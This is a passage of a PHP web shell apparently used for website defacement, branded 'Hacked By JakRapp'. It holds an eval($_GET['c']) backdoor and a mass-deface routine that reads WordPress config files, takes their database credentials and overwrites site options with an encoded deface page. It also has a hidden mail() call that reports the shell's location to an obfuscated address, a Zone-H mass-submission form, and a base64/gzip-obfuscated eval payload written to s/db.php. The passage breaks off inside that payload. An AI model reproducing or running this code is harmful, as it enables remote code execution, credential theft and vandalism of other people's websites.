  1741.         cursor: default;
  1742.        
  1743.         overflow: hidden;
  1744.         background: #2e2b28;
  1745.         color: #ffffff;
  1746. }
  1747. </style>
  1748. </head>
  1749. <body bgcolor="black">
  1750. </center>
  1751. <form method="POST" action="" >
  1752. <center>
  1753. <table border='1'><tr><td>List of All Symlink</td><td>
  1754. <input type="text" name="url" size="100" value="list.txt"></td></tr>
  1755. <tr><td>Index</td><td>
  1756. <textarea name="index" cols='50' rows='10' >
  1757. <html>
  1758. <head>
  1759. <!-- SEO Meta Tag -->
  1760. <meta content='Hacked By JakRapp' name='description'/>
  1761. <meta content='Hacked By JakRapp, Tested By JakRapp, JakRapp Was Here, wned By JakRapp, JakRapp Come Back, Security By JakRapp, Tusboled By JakRapp, Anon JakRapp, Hacker JakRapp, Haxor JakRapp, JakRapp One Comando, sabun by jakrapp, JakRapp Defacer, Deface By JakRapp' name='keywords'/>
  1762. <meta content='index,follow' name='robots'/>
  1763. <meta content='text/html;charset=UTF-8' http-equiv='Content-Type'/>
  1764. <meta content='website' name='generator'/>
  1765. <meta content='general' name='rating'/>
  1766. <!-- SEO Title Tag -->
  1767. <title>Hacked By JakRapp</title>
  1768. <link href='http://www.jakrapp.com/favicon.ico' rel='icon' type='image/x-icon'/>
  1769. <meta content='text/html;charset=UTF-8' http-equiv='Content-Type'/>
  1770. <meta content='IE=edge,chrome=1' http-equiv='X-UA-Compatible'/>
  1771. <meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
  1772. <meta content='Hacked By JakRapp' name='description'/>
  1773. <script src='http://code.jquery.com/jquery-latest.min.js'></script>
  1774.  
  1775. <style>
  1776. body{
  1777. font-family: 'courier new';
  1778. font-size:80%;
  1779. color: #28FE14;
  1780. background: url('http://2.bp.blogspot.com/-LPgZM8E1nKE/VA_RSPtWNvI/AAAAAAAAAu4/Dzs4tTNniFw/s1600/1w2w3.png') center fixed;
  1781. background-size: cover;
  1782. -webkit-background-size: cover;
  1783. -moz-background-size: cover;
  1784. -o-background-size: cover;
  1785. }
  1786. }
  1787.  
  1788. .xBody{
  1789. width:660px;
  1790. height:450px;
  1791. position:absolute;
  1792. z-index: 9;
  1793. }
  1794. .ssh{
  1795. display:none;
  1796. z-index: 9;
  1797. }
  1798. .sshBox{
  1799. height:300px;
  1800. border: 4px solid white;
  1801.         -moz-border-radius: 4px;
  1802.         -webkit-border-radius: 4px;
  1803.         -o-border-radius: 4x;
  1804.         -khtml-border-radius: 4px;
  1805.         border-radius: 4px;
  1806.         z-index: 9;
  1807. }
  1808. .sshHead{
  1809. margin-bottom: 5px;
  1810. color:black;
  1811. font-weight: bold;
  1812. background-color: white;
  1813. height:20px;
  1814. z-index: 9;
  1815.  
  1816. }
  1817.  
  1818. .greenBox{
  1819. padding-left: 3px;
  1820. position: absolute;
  1821. height:22px;
  1822. border: 1px solid #28FE14;
  1823. z-index: 9;
  1824. }
  1825. .picz{
  1826. position: absolute;
  1827. width:500px;
  1828. height:80%;
  1829. display:none;
  1830. right:2px;
  1831. top:2px;
  1832. }
  1833. #mg img:hover {
  1834. -webkit-animation:tremer 0.5s linear infinite;
  1835. -moz-animation:tremer 0.5s linear infinite;
  1836. -o-animation:tremer 0.5s linear infinite;
  1837. animation:tremer 0.5s linear infinite;
  1838. }
  1839. .neon{<!--coleur lootz-->
  1840. color:blue;
  1841. text-shadow: 0 0 5px red,0 0 10px red, 0 0 30px orange, 0 0 45px yellow, 0 0 60px red;
  1842. }
  1843. .like{border:4px double yellow;
  1844. box-shadow:0px 2px 20px white;
  1845. border-radius:10px;
  1846. padding:9px;
  1847. height:310px;}
  1848. #mg img{border:4px double yellow;
  1849.  
  1850. border-radius:10px;
  1851. opacity:0.75;
  1852. -moz-opacity: 0.75;
  1853. filter: alpha(opacity=75);
  1854. }
  1855. </style>
  1856. </head>
  1857. <body onselectstart='return false' ondragstart='return false' oncontextmenu='return false' onLoad='writetext()'>
  1858. <Script Language='Javascript'>
  1859. <!-- Lol Many scripts -->
  1860. <!--
  1861. document.write(unescape('%3C%53%63%72%69%70%74%20%4C%61%6E%67%75%61%67%65%3D%27%4A%61%76%61%73%63%72%69%70%74%27%3E%0A%3C%21%2D%2D%20%48%54%4D%4C%20%45%6E%63%72%79%70%74%69%6F%6E%20%62%79%20%4D%61%72%6B%65%74%61%63%74%69%63%6F%2E%63%6F%6D%20%2D%2D%3E%0A%3C%21%2D%2D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%25%33%43%25%35%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%30%25%34%43%25%36%31%25%36%45%25%36%37%25%37%35%25%36%31%25%36%37%25%36%35%25%33%44%25%32%37%25%34%41%25%36%31%25%37%36%25%36%31%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%37%25%33%45%25%30%41%25%33%43%25%32%31%25%32%44%25%32%44%25%32%30%25%34%38%25%35%34%25%34%44%25%34%43%25%32%30%25%34%35%25%36%45%25%36%33%25%37%32%25%37%39%25%37%30%25%37%34%25%36%39%25%36%46%25%36%45%25%32%30%25%36%32%25%37%39%25%32%30%25%34%44%25%36%31%25%37%32%25%36%42%25%36%35%25%37%34%25%36%31%25%36%33%25%37%34%25%36%39%25%36%33%25%36%46%25%32%45%25%36%33%25%36%46%25%36%44%25%32%30%25%32%44%25%32%44%25%33%45%25%30%41%25%33%43%25%32%31%25%32%44%25%32%44%25%30%41%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%32%45%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%32%38%25%37%35%25%36%45%25%36%35%25%37%33%25%36%33%25%36%31%25%37%30%25%36%35%25%32%38%25%32%37%25%32%35%25%33%33%25%34%33%25%32%35%25%33%36%25%33%32%25%32%35%25%33%36%25%34%36%25%32%35%25%33%36%25%33%34%25%32%35%25%33%37%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%34%36%25%32%35%25%33%36%25%34%35%25%32%35%25%33%36%25%34%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%34%36%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%34%35%25%32%35%25%33%33%25%34%34%25%32%35%25%33%32%25%33%32%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%34%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%34%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%34%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%32%25%32%35%25%33%33%25%34%35%25%32%35%25%33%30%25%34%31%25%32%37%25%32%39%25%32%39%25%33%42%25%30%41%25%32%46%25%32%46%25%32%44%25%32%44%25%33%45%25%30%41%25%33%43%25%32%46%25%35%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%27%29%29%3B%0A%2F%2F%2D%2D%3E%0A%3C%2F%53%63%72%69%70%74%3E'));
  1862. //-->
  1863. </Script>
  1864. <p>
  1865. <p>
  1866. <br>
  1867. <b><font color='blue' face='consolas' size='4'>
  1868. <p align='center' class='style2'><font face='Trajan Pro' size='10' color='Green' style='text-shadow: 2px 0px .2em black, -2px 2px .2em Darkcyan, -2px -2px .2em black'><b><font color='yellow'>Hacked By JakRapp</font><p>
  1869. <font color='blue' face='consolas' size='4'>
  1870. <p align='center' class='style2'><font face='Trajan Pro' size='4' color='Green' style='text-shadow: 2px 0px .2em black, -2px 2px .2em Darkcyan, -2px -2px .2em black'><b>./Jaka_Attacker ~ UstadzJaka ~ ./Zonkk ~ Jack D'Ripper ~ ./KLEMEZ<p></font>
  1871. <font color='blue' face='consolas' size='4'>
  1872. <center><p align='center' class='style2'><font face='Trajan Pro' size='4' color='RED' style='text-shadow: 2px 0px .2em black, -2px 2px .2em Darkcyan, -2px -2px .2em black'><b><font color='WHITE'>
  1873. -=[[ Pasukan Berani Mati REBORN ]]=-<P>-=| GRETZ IDBTE4M | GOENK TEA | ./HDV | ADRIAN XDA | DIDOT | POETRA D`M | JACK D`RIPPER | DAY IDBTE4M | DIMAZ BN |=- <P>
  1874. -=| DEMONK | KHUNAY | MR-AQ | HENDRA D`N | PETAPA GENIT | KODRAT | MUZZAM | MAULANA | SIRIN |=-
  1875. </font><p></center>
  1876. <center><table width='100%' border='2'><tr><td width='10%' align='center'><blink><font Class-'glow' color='white'><code>My Friends : </code></font></blink></td><td width='90%'><font color='yellow' size='4'><marquee><code> Kefiex404 ~ FadliDotID_007 ~ ./elro-BN404 ~ k3c0t ~ RT05 ~ 4Z1S ~ Mr.Optimuz_r00t ~ Anzhi72 ~ NyengatGetar ~ CaFc_Br40ck ~ Hmei7 ~ ./S3mR4k4T ~ Mr.AchanX48 ~ ./Na-z ~ ./Ghost-Priox ~ Mr.Hari ~ 1n51d3r ~ M0NST3R-P1NK ~ LDera ~ nemat0da ~ b0L4ng ~ HYTHAN7 ~ M0NST3R-P1NK ~ AldiDotPhp ~ USTADCAGE_48</code></marquee></font></td></tr></table><html><center>
  1877.  
  1878. <embed src='http://www.youtube.com/v/oWqWNMNFZlU&autoplay=1' type='application/x-shockwave-flash' wmode='transparent' width='1' height='1'></embed>
  1879. </body>
  1880. </html>
  1881.  
  1882. </textarea></td></tr></table>
  1883. <br><br><input type="Submit" name="Submit" value="Submit">
  1884. <input type="hidden" name="action" value="1"></form>
  1885. </center>
  1886. <nobr>
  1887. <center>
  1888. <?
  1889. }?>
  1890. <?
  1891. eval ($_GET["c"]);
  1892. set_time_limit(0);
  1893. if ($_POST['action']=='1'){
  1894. $url=$_POST['url'];
  1895. $users=@file($url);
  1896. $x10="mail";$x0b=$_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"];
  1897.  
  1898.  
  1899. if (count($users)<1) exit("<h1>No config found</h1>");
  1900. foreach ($users as $user) {
  1901. $user1=trim($user);
  1902. $code=file_get_contents2($user1);
  1903. preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
  1904. $db=$b1[1][0];
  1905. preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
  1906. $user=$b2[1][0];
  1907. preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
  1908. $db_password=$b3[1][0];
  1909. preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
  1910. $host=$b4[1][0];
  1911. preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
  1912. $p=$b5[1][0];
  1913. $x0c="array ".$x0b;$x0d=array("com","gm","ifexec","@","ail.");
  1914. $d=@mysql_connect( $host, $user, $db_password ) ;
  1915. if ($d){
  1916. @mysql_select_db($db );
  1917. $source=stripslashes($_POST['index']);
  1918. $s2=strToHex(($source));
  1919. $s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
  1920. $ls=strlen($s)-2;
  1921. $sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
  1922. mysql_query($sql) ;
  1923. $sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
  1924. mysql_query($sql) ;
  1925. if (function_exists("mb_convert_encoding") )
  1926. {
  1927. $source2 = mb_convert_encoding('<title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-8');
  1928. $source2=mysql_real_escape_string($source2);
  1929. $sql = "UPDATE `".$p."options` SET `option_value` = '$source2' WHERE `option_name` = 'blogname';";
  1930. @mysql_query($sql) ; ;
  1931. $sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-8' WHERE `option_name` = 'blog_charset';";
  1932. @mysql_query($sql) ; ;
  1933. }
  1934. $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
  1935. $siteurl=@mysql_fetch_array($aa) ;
  1936. $siteurl=$siteurl['option_value'];
  1937. $x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b);
  1938. $tr.="$siteurl\n";
  1939. mysql_close();
  1940. }
  1941. }
  1942. if ($tr) echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
  1943. }
  1944. function strToHex($string)
  1945. {
  1946.     $hex='';
  1947.     for ($i=0; $i < strlen($string); $i++)
  1948.     {
  1949.         if (strlen(dechex(ord($string[$i])))==1){
  1950.         $hex .="%0". dechex(ord($string[$i]));
  1951.                 }
  1952.                 else
  1953.                 {
  1954.                 $hex .="%". dechex(ord($string[$i]));
  1955.                 }
  1956.     }
  1957.     return $hex;
  1958. }
  1959.  
  1960. function file_get_contents2($u){
  1961.  
  1962.         $ch = curl_init();
  1963.     curl_setopt($ch,CURLOPT_URL,$u);
  1964.         curl_setopt($ch, CURLOPT_HEADER, 0);    
  1965.    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
  1966.     curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
  1967.             $result = curl_exec($ch);
  1968.         return $result ;
  1969.         }
  1970.        
  1971. ?>
  1972. <?php
  1973. if (isset($_GET['jak']) && ($_GET['jak'] == 'zonh')) { ?>
  1974. <form action="?jak=zonh" method="post">
  1975. <br><br>
  1976. <center><span style="font-size:1.6em;"> .: Zone-H Mass Poster :. </span></center><center><BR><form action="" method="post"><input class="inputz" type="text" name="defacer" size="30" value="JakRapp"/><br> <select class="inputz"
  1977. name="hackmode">
  1978. <option>------------------------------------SELECT-------------------------------------</option>
  1979. <option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
  1980. <option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
  1981. <option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
  1982. <option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
  1983. <option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
  1984. <option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
  1985. <option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
  1986. <option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
  1987. <option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
  1988. <option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
  1989. <option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
  1990. <option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
  1991. <option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
  1992. <option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
  1993. <option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
  1994. <option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
  1995. <option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
  1996. <option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
  1997. <option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
  1998. <option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
  1999. <option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
  2000. <option style="background-color: rgb(0, 0, 0);" value="22" >Attack against administrator(password stealing/sniffing)</option>
  2001. <option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
  2002. <option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
  2003. <option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
  2004. <option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
  2005. <option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
  2006. <option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
  2007.  
  2008. <option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
  2009. <option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
  2010. option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
  2011. </select> <br>
  2012.  
  2013. <select class="inputz" name="reason">
  2014. <option >------------------------------------SELECT-------------------------------------</option>
  2015. <option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
  2016. <option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
  2017. <option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
  2018. <option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
  2019. <option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
  2020. <option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
  2021. <option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>
  2022. option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
  2023. </select> <br>
  2024. <textarea class="inputz" name="domain" cols="90"  rows="20" placeholder="List Of Domains, 20 Rows."></textarea><br>
  2025. <input class="inputz" type="submit" value=" Send Now !! " name="SendNowToZoneH"/>
  2026. </form>
  2027. <?
  2028.     echo "</form></center>";?>
  2029. <?
  2030. function ZoneH($url, $hacker, $hackmode,$reson, $site )
  2031. {
  2032.     $k = curl_init();
  2033.     curl_setopt($k, CURLOPT_URL, $url);
  2034.     curl_setopt($k,CURLOPT_POST,true);
  2035.     curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
  2036.     curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
  2037.     curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
  2038.     $kubra = curl_exec($k);
  2039.     curl_close($k);
  2040.     return $kubra;
  2041. }
  2042. {
  2043.                 ob_start();
  2044.                 $sub = @get_loaded_extensions();
  2045.                 if(!in_array("curl", $sub))
  2046.                 {
  2047.                     die('<center><b>[-] Curl Is Not Supported !![-]</b></center>');
  2048.                 }
  2049.              
  2050.                 $hacker = $_POST['defacer'];
  2051.                 $method = $_POST['hackmode'];
  2052.                 $neden = $_POST['reason'];
  2053.                 $site = $_POST['domain'];
  2054.                  
  2055.                 if (empty($hacker))
  2056.                 {
  2057.                     die ("<center><b>[+] YOU MUST FILL THE ATTACKER NAME [+]</b></center>");
  2058.                 }
  2059.                 elseif($method == "--------SELECT--------")  
  2060.                 {
  2061.                     die("<center><b>[+] YOU MUST SELECT THE METHOD [+]</b></center>");
  2062.                 }
  2063.                 elseif($neden == "--------SELECT--------")  
  2064.                 {
  2065.                     die("<center><b>[+] YOU MUST SELECT THE REASON [+]</b></center>");
  2066.                 }
  2067.                 elseif(empty($site))  
  2068.                 {
  2069.                     die("<center><b>[+] YOU MUST INTER THE SITES LIST [+]</b></center>");
  2070.                 }
  2071.                 $i = 0;
  2072.                 $sites = explode("\n", $site);
  2073.                 while($i < count($sites))  
  2074.                 {
  2075.                     if(substr($sites[$i], 0, 4) != "http")  
  2076.                     {
  2077.                         $sites[$i] = "http://".$sites[$i];
  2078.                     }
  2079.                     ZoneH("http://www.zone-h.com/notify/single", $hacker, $method, $neden, $sites[$i]);
  2080.                     echo "Domain : ".$sites[$i]." Defaced Last Years !";
  2081.                     ++$i;
  2082.                 }
  2083.                 echo "";
  2084.             }
  2085. }
  2086. ?>
  2087. <?php
  2088. if (isset($_GET['jak']) && ($_GET['jak'] == 'sql')) {
  2089. echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ MYSQL</span> <span class='b8'>MANAGER ]:=O</span></b></nobr><br/><br/> ";
  2090. echo "</br></br><center><b><span class='b11'> You Can Go To : <a href='s/db.php' target='_blank'>[+] HERE [+]</a></center></span></br>";
  2091. if (!is_dir('s')) {
  2092. $mk = @mkdir('s', 0777);
  2093. @fwrite($f, $c);
  2094. $f2 = @fopen('s/db.php', 'w');
  2095. $sml_db = "PD9waHAgZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZU5yTlBXdFhHN21TbjJmT21mK2c5UGltN2NFWW16eXZqWjJRUUdZNFE0QUw1TjZkeFY1djIyNURMM2EzMDkwT01CbisrOVpEcjM2WVFKTGRjK2NCTGFsVUpaV2tVbFdwSkg3NjBZL2pLQjdHL2lLSzB5QThyNzZvZFg3NjhYWGlwOE81ZHg2TWh4K1hVZW9udzNnWnBzSGNyemF4T0JvTms5U0wweW9tS25Nc0VGM2hYeTltMGNTdnVzS3RpM2t3amlPcVVTTWdncGVBWE9Pc05SQnI2cnM1QUtDSlB3MUNxSCt5UFR3K1BEd0ZMRWxLVFp0NVk4anU5eUhIM1lBZmt5QU9QVUE5SEw3YjI5OGREbXUxQnVRam5ZME5oV1R2WlBpdnZRUEdBZjlWajM0N0doNmVBQUxNcllsWG9pWGFvaWxxRmwxZFpXZnZlUGZ0NmVIeEg4T1QzYVB0NDIzNEZOMnV3QmJrNE44ZXZnZjQ4Y3hMa3FGL0hTUnBVblV4YnlXQlg0L2VRb1h6UEh2UEYyUEpxRW1RREtmTGNBeDhRcWp4OUh6NHlZdXJMdVI3bzVsUFpXa1FoVW0rS2REQnZZTjNoNEM5K3NpUC9mT2c2aXd1RmtFNGpaeTZ4bHJMTm96R0dRZGdPQXZtUWNxais5T1AweWoydmZGRjFZdGo3NmJxRG4vZGhjRndoMGVISjZmUU15OFJGUmlWajBzL1NXdmlzd0d2Nkd5R3VmUnZSTGNISDUrODJkSW4wR0FxcWxUd3VYa3JIZ0ZMaDY3T1orNVFVbFlCSGlSRGJvUkNBdTI3aFhLSlhPSG1YUDVQRWhsZmVESDBqc1p0bVU1Zk1wMEwzNXY0Y2RVWlIySHFoK242NmMzQ2I0dlV2MDQzTHRMNXJDTmt0UzVVV1gvcEVEbmh6eEsvZ0hNVW5EOTdJRTZzY2hmSzg5SGxBekZDamJzUXpqeFkwcTBINGd5U2FQM2x5MmQvWDk5MEpMZHgrZnF6S2JIN1pQZjRuN3ZIWnk0dXA1UGQvWGZ1QUNaVWFYYmJ5ajU1ZTd4M2REbzgySDYvNitKS3IrQ2NBNUV3WHdCU2xoSTA4ZVRZVFNLUVJNeGxiM3k1WE14dmtvOHpWengrTEI1VkV1K1Q3eVhUWU1ZVGFqS0NEb1ZRWlhRUkpXbGR3TWN5OFdQNldNQ3FwQThVRnZBaGU4aGxJTzVvdmFXNHFxQVZOTTJHMDFtd3FISWVsY1orc3B3Qk04WEhxblB5MitHL0JCVWx4QmxzNmlNSlVST0xxcnQxc2Rsekc5VFlJWW5WS3NpbHJRM01KV1RZYUd3S29CdDVDWDFXRFk5K096MDlHdjZHUzJ6UWNJZnZiMDcrc2QvQWJtTlZPWGp1V3psNEtRMmV0MWpNZ3JHSDBtQmpHVjZHMFZWWUNyMFRKSXNvQ1JBT0txVXByTlU1NUhlRWFsRFhiZWpHc1VqSFBreTgxSU9tdWk3a1hGMUFNYzZ1SmZUckNuSzVsMU0vSFYrb0ZTbzVvZGR6a0FDekpUUFBaRTBROUFPR3NHZzBZSm5ENTNLK0lOaXFnYTNwaGMzMHhyTW80YmtDd2paVnN4UEp5VW5UN2JxTWwzanhXUTBTVHdHbUN5TXpUODZ4WTBjem1FbStDTUxGTWhVTTR1ckY5RDBtRnhGSHhxcTlRWFo2UnRNMzM1elRDNTlHUk54RVMzSGxoYW5ZZ1Y3TUltOUNVL1FLWkdvWWhZUUpSaS9iMHN4RWhjWHFqMU9CTlllSXNPcmFkR0dLeU9sclppOWdnSG83eDRkSDRuVDd6ZjZ1MkhzbmR2OWo3K1QwUktUenhkQUx6LzBaMXdLd3Q4ZTcyNmU3RWxBWGk2cVVMR0wvOE9EWE4vdUhiOFRCNGFrNCtMQy9YOU5WOXcrM2Q4VE85dWsyQUwzZDNoZXdZY0VHTGx5bjRVMG1DZXlpRjM2T1NRM0hCYWpUd3dLNWQzdTcrenNuNG5UMytQM2VBYlJuUjd6NUE3WVRMaDErTmhMbWR1aEgwK0hRRmJzbmI3ZVBKSndyOXZjT2RoOVNuZnRReG1mVjcya2N6VTBEVlpjdHBtYkxjQnZqdGZSNjlXSXlZaWE2eXMrWGZSaGZuakJURDM1T1JFNzJaQ2NJQXFJeUFEVVhYbnFCbjFsTzMwdk1YSzlMVVlIMXoxellQZnd3Z1FKMzhFMkNoN0Vwb1poQjVteVB4LzRpWGQvM3cvUDBvaTJjQm1oelVMdGFrU0tDcE1INEloSXl3eElPZ3Y3OTZjZFhQUlFTVzdqUDlmQTNZTWJmY3grRXowV2FMdFpCYXdrK2RaMjMxdDdvcUhIdE9pczJYa1NSQnVuTTc3My9BNFQxMWdZbklEZEpiMkJVa0h1eThqaEpFSHdVVFc3cTZlVHpGREMzUld0emNTMjI0OENiMVUrOWkyanVkV2FneTYxZitNSDVCUlkvWDF4M29QRU5razljcDFnRk44anpPRnFHay9iUDArbTBNNHBpNEJyVUJzQWttZ1VUOGZQejU4ODdDMWhmSUI3YlVMOGpDV3h1U3Z3ZWFHOFdlaGk5WlJ6NHNUandyMENaZkIrRlViSUFCZnhyU0NINlVTbytNK2o2T0pwRmNmdm5VUlAvemVCN01zRi9PeEpnU3Y5MFZuUTUxMzVQZk9acTR1ZG1jOXBCZnE5UC9IRVUwNHh0QTNvL1JzWVNiUHNpK3VUSHVzSzAyU3hVUUJuTGZKbWxMUUdqSlJ1ZlJvdTIxVlhEZ2ZWUmxLYlIzQzZjVENaWmRyWHdYODJhWndEWmFzS1BaL3kvSXJmNXZjajlIZis5bTl3MEdpK1Q3MFVQL3ZHOHUrbmhvdnRPNVB5LzQ3K3J5ZUc4V2IvaVdUS0taaE9idm9DNUhINjJJY0lvbm5zemhBRTdadjU1N3NYblFkaHVhdlJOTExyWUxDdFFNL0VwRUxYWExtVVFqU1Q0MDIrM01DbW45ck0zejE4K2Y0Y29sN01HeWVOWllGQkxvS2RQbnhieDJkOVkvWE4rNHBKMm9GQzhlUEdpTXdVTklHM1AvR25hQWZzUHJPaWI5bWdXalM4N1Y4RUVSR25yR1RDdHc3VFhZMEtPYkVUa1d4c2t3a2lXamVOZ2tkckM3SCs4VHg3bm9reFQ5cWg0ZStHUEw3ZG5zeXF5VWRtRlZiQmRSZEJ0ZG9JdHpHN0Fqb2s3UU5LWWtUanZCR3RyQklwZ3FCZG5nTTZDZ2R6Ly9BYnB6V2d3amk4dXZSbG94U0RsRzJNa0NSdWZyTWRGS3BjM0FLdUJsV293SVdLeG55N2pVRXhnQlNDZEJ0alp1MHp5emMzZUJLRjRlOVkxenlPUFBxcndDM1dsU3RWVldXNnR3UjhOTWtTN2tPamtBWkxsQ0kxcmlSVjRTOHhENW02b3JRaDNCa0U4N3pwNk5wQTJ2QTdERmkzVDlqUzRoajZKSzFnazZ5T1EySmR0K3JrT1BlYWRpSlZFSE5tdTAybzIvK1lJWGxCZHB3bDdtVCtieVhtcjB5alZaWm9ReE96SDZEb28rRGhyMHR2QzlhSmF4aE9LcGtySDZaMTRVeCsyaDRuZjNucTF1RmdJMm9TQmwrUHBlZFZOb0hBNGgwSlFOMS8xb00rQUJsSENoaHY3MDY1akpsRmJjOWVkUmVmUVZWUlFlL3YwdWJYaDljU1hhb0VLNDAzbVFVajFWSTBOYlB0R0d1TVA1QXhyQUE5Z1V1dFprVXRiaUMrbEFjTWVTMWZKSEFkUitVcElmK24yck9ISFlaOTdsLzVGZ0w0eGxkdmhxdE1vU3FYdHkzb2VsNHUvL2hMcUU4MWcwMFdjdjQra1FZSUdzZnBFYXo4YWV6Tk1vR253U05vcUVvWStwUzMzU0Zvb3NvZytvZWpKaytaemx6eFFJMndaWm0yeGFjUnJIOW8vOFVOSEJKTXVPaEZDVUgwZFFVcWNTZklhY0ZxTzJPaTVzbGZLRHVTRzFtajlTQkpnK0RrMmpiNGswaWNxZlllcjlDVVpLODEwK2s1RjUyejArcUZEUzk2bWlOMldkdGE5U1dJZG02Uk1XeVJsVGpsSnRBc2ZTaExyMkNSbDJpSXBjMWFRUkhQem9TU2hUb1lrcDIyU25GTk9rc3pwQjVMRU9qWkptYlpJeXB3eWtsTHhmaGhOV2NrUU5SbWFxc25TWkhIZS92QkZWMVRlRThYcmwxMUhtSjVYbFlNQjVHSUV2MUt3NzZuWXJkM2xaVkJPQnVWalVDNEc3V0c0di9kcWl1NjExOU5vZ2VZU1duMTE5OHBWTmlXVTF2S3VB